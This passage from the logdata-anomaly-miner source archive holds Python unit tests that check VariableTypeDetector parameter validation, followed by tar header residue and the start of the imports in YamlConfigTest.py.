self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_stat_stop_update=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_updates_until_var_reduction=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, var_reduction_thres=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_skipped_ind_for_weights=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_ind_for_weights=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test="SomethingElse") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test="MT") VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test="Approx") VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_multinomial_test="Chi") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, use_empiric_distr=True) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test="SomethingElse") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test="MeanSD") VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test="EmpiricQuantiles") VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_range_test="MinMax") self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_threshold=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_reinit_range=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=100) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, range_limits_factor=100.22) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=1.1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, dw_alpha=0.05) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, save_statistics=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list="") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=["/model/path"]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=[]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list="") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=["/model/path"]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=[]) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=None) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list="") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["file:///tmp/syslog"]) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/__init__.py000066400000000000000000000000001500476301700257020ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/000077500000000000000000000000001500476301700226715ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/YamlConfigTest.py000066400000000000000000001560631500476301700261460ustar00rootroot00000000000000import unittest import importlib import yaml import sys import re import aminer.AminerConfig as AminerConfig from datetime import datetime from aminer.AnalysisChild import AnalysisContext from aminer.analysis.AtomFilters import SubhandlerFilter from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.analysis.HistogramAnalysis import HistogramAnalysis, PathDependentHistogramAnalysis from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector from aminer.analysis.MatchFilter import MatchFilter from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom 